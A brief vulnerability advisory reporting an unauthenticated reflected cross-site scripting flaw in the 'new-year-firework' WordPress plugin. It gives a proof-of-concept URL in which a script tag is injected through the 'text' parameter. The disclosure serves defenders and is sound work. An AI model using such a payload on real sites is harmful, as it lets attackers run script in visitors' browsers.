The new-year-firework WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
http://www.example.com/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"